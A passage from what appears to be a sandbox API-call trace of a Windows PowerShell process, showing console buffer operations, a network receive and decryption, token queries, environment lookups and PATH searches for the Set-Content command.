pfQOP=0x0) returned 0x0 [0164.952] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0164.953] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0165.126] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0165.126] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0165.127] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0165.127] CoTaskMemFree (pv=0x1e35146d810) [0165.127] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0165.128] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0165.204] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0165.204] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0165.204] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0165.205] CoTaskMemFree (pv=0x1e35146d810) [0165.205] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0165.205] recv (in: s=0x898, buf=0x1e3393bf4d5, len=7029, flags=0 | out: buf=0x1e3393bf4d5*) returned 7029 [0165.206] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e3395d9a00, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e3395d9a00, pfQOP=0x0) returned 0x0 [0165.206] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0165.206] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0165.283] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0165.284] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0165.284] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0165.285] CoTaskMemFree (pv=0x1e35146d810) [0165.286] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0165.287] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0165.287] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1a8 | out: lpConsoleScreenBufferInfo=0xb156f8d1a8) returned 1 [0165.288] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0165.288] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d040 | out: lpWriteRegion=0xb156f8d040) returned 1 [0165.288] CoTaskMemFree (pv=0x1e35146d810) [0165.576] EtwEventActivityIdControl () returned 0x0 [0165.640] CoTaskMemAlloc (cb=0x20e) returned 0x1e35144df90 [0165.640] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1e35144df90, nSize=0x105 | out: lpBuffer="") returned 0x0 [0165.640] CoTaskMemFree (pv=0x1e35144df90) [0165.640] EtwEventActivityIdControl () returned 0x0 [0165.640] EtwEventActivityIdControl () returned 0x0 [0165.640] EtwEventActivityIdControl () returned 0x0 [0165.683] EtwEventActivityIdControl () returned 0x0 [0166.390] GetCurrentProcess () returned 0xffffffffffffffff [0166.390] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb156f8d7f8 | out: TokenHandle=0xb156f8d7f8*=0x458) returned 1 [0167.046] GetTokenInformation (in: TokenHandle=0x458, TokenInformationClass=0x2, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xb156f8d8b8 | out: TokenInformation=0x0, ReturnLength=0xb156f8d8b8) returned 0 [0167.046] LocalAlloc (uFlags=0x0, uBytes=0x1b4) returned 0x1e35117a1d0 [0167.047] GetTokenInformation (in: TokenHandle=0x458, TokenInformationClass=0x2, TokenInformation=0x1e35117a1d0, TokenInformationLength=0x1b4, ReturnLength=0xb156f8d8b8 | out: TokenInformation=0x1e35117a1d0, ReturnLength=0xb156f8d8b8) returned 1 [0167.056] LocalFree (hMem=0x1e35117a1d0) returned 0x0 [0167.348] CoTaskMemAlloc (cb=0x20e) returned 0x1e35144cc70 [0167.348] GetEnvironmentVariableW (in: lpName="SystemRoot", lpBuffer=0x1e35144cc70, nSize=0x105 | out: lpBuffer="") returned 0xa [0167.348] CoTaskMemFree (pv=0x1e35144cc70) [0167.349] CoTaskMemAlloc (cb=0x20e) returned 0x1e3514516d0 [0167.349] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1e3514516d0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0167.349] CoTaskMemFree (pv=0x1e3514516d0) [0167.358] CoTaskMemAlloc (cb=0x20e) returned 0x1e35144f6f0 [0167.358] GetEnvironmentVariableW (in: lpName="SystemRoot", lpBuffer=0x1e35144f6f0, nSize=0x105 | out: lpBuffer="") returned 0xa [0167.358] CoTaskMemFree (pv=0x1e35144f6f0) [0168.545] CoTaskMemAlloc (cb=0x20e) returned 0x1e35144ee70 [0168.545] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1e35144ee70, nSize=0x105 | out: lpBuffer="") returned 0x0 [0168.545] CoTaskMemFree (pv=0x1e35144ee70) [0168.545] CoTaskMemAlloc (cb=0x20e) returned 0x1e35144bfb0 [0168.545] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1e35144bfb0, nSize=0x105 | out: lpBuffer="") returned 0x3a [0168.545] CoTaskMemFree (pv=0x1e35144bfb0) [0168.546] CoTaskMemAlloc (cb=0x20e) returned 0x1e35144db50 [0168.546] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1e35144db50, nSize=0x105 | out: lpBuffer="") returned 0x3a [0168.546] CoTaskMemFree (pv=0x1e35144db50) [0168.546] CoTaskMemAlloc (cb=0x20e) returned 0x1e35144f4d0 [0168.546] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1e35144f4d0, nSize=0x105 | out: lpBuffer="") returned 0x9c [0168.546] CoTaskMemFree (pv=0x1e35144f4d0) [0168.546] CoTaskMemAlloc (cb=0x20e) returned 0x1e35144d2d0 [0168.546] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1e35144d2d0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0168.546] CoTaskMemFree (pv=0x1e35144d2d0) [0168.546] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0168.547] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.547] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0x8d2bb5de, ftCreationTime.dwHighDateTime=0x1d8c105, ftLastAccessTime.dwLowDateTime=0x8d2bb5de, ftLastAccessTime.dwHighDateTime=0x1d8c105, ftLastWriteTime.dwLowDateTime=0x8d2bb5de, ftLastWriteTime.dwHighDateTime=0x1d8c105, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0168.547] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.547] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.547] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0168.548] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\Set-Content.ps1" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\set-content.ps1"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.548] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.548] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.548] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0168.548] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.549] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0x8d2bb5de, ftCreationTime.dwHighDateTime=0x1d8c105, ftLastAccessTime.dwLowDateTime=0x8d2bb5de, ftLastAccessTime.dwHighDateTime=0x1d8c105, ftLastWriteTime.dwLowDateTime=0x8d2bb5de, ftLastWriteTime.dwHighDateTime=0x1d8c105, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0168.549] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.549] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.549] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0168.549] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\Set-Content.psm1" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\set-content.psm1"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.549] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.549] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.549] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0168.550] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.550] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0x8d2bb5de, ftCreationTime.dwHighDateTime=0x1d8c105, ftLastAccessTime.dwLowDateTime=0x8d2bb5de, ftLastAccessTime.dwHighDateTime=0x1d8c105, ftLastWriteTime.dwLowDateTime=0x8d2bb5de, ftLastWriteTime.dwHighDateTime=0x1d8c105, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0168.550] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.550] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.550] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0168.550] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\Set-Content.psd1" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\set-content.psd1"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.550] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.550] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.550] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0168.550] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.550] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0x8d2bb5de, ftCreationTime.dwHighDateTime=0x1d8c105, ftLastAccessTime.dwLowDateTime=0x8d2bb5de, ftLastAccessTime.dwHighDateTime=0x1d8c105, ftLastWriteTime.dwLowDateTime=0x8d2bb5de, ftLastWriteTime.dwHighDateTime=0x1d8c105, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0168.551] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.551] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.551] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0168.551] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\Set-Content.COM" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\set-content.com"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.551] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.551] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.551] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0168.551] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.551] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0x8d2bb5de, ftCreationTime.dwHighDateTime=0x1d8c105, ftLastAccessTime.dwLowDateTime=0x8d2bb5de, ftLastAccessTime.dwHighDateTime=0x1d8c105, ftLastWriteTime.dwLowDateTime=0x8d2bb5de, ftLastWriteTime.dwHighDateTime=0x1d8c105, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0168.551] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.551] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.551] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0168.552] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\Set-Content.EXE" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\set-content.exe"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.552] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.552] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.552] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0168.552] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.552] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0x8d2bb5de, ftCreationTime.dwHighDateTime=0x1d8c105, ftLastAccessTime.dwLowDateTime=0x8d2bb5de, ftLastAccessTime.dwHighDateTime=0x1d8c105, ftLastWriteTime.dwLowDateTime=0x8d2bb5de, ftLastWriteTime.dwHighDateTime=0x1d8c105, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0168.552] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.552] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.552] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0168.552] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\Set-Content.BAT" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\set-content.bat"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.553] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.553] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.553] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0168.553] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.553] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0x8d2bb5de, ftCreationTime.dwHighDateTime=0x1d8c105, ftLastAccessTime.dwLowDateTime=0x8d2bb5de, ftLastAccessTime.dwHighDateTime=0x1d8c105, ftLastWriteTime.dwLowDateTime=0x8d2bb5de, ftLastWriteTime.dwHighDateTime=0x1d8c105, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0168.553] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.553] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.553] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0168.553] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\Set-Content.CMD" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\set-content.cmd"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.554] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0168.554] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.554] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0x8d2bb5de, ftCreationTime.dwHighDateTime=0x1d8c105, ftLastAccessTime.dwLowDateTime=0x8d2bb5de, ftLastAccessTime.dwHighDateTime=0x1d8c105, ftLastWriteTime.dwLowDateTime=0x8d2bb5de, ftLastWriteTime.dwHighDateTime=0x1d8c105, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0168.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.554] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.554] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0168.554] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\Set-Content.VBS" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\set-content.vbs"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.555] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.555] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0168.555] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.555] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0x8d2bb5de, ftCreationTime.dwHighDateTime=0x1d8c105, ftLastAccessTime.dwLowDateTime=0x8d2bb5de, ftLastAccessTime.dwHighDateTime=0x1d8c105, ftLastWriteTime.dwLowDateTime=0x8d2bb5de, 